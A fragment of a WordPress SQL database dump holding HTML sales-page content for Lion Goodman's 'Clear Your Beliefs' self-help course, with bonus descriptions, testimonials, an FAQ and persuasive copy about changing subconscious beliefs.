</em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 750px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 21:09:09', '2014-06-18 02:09:09', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(997, 4194, '2014-06-17 21:10:30', '2014-06-18 02:10:30', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious 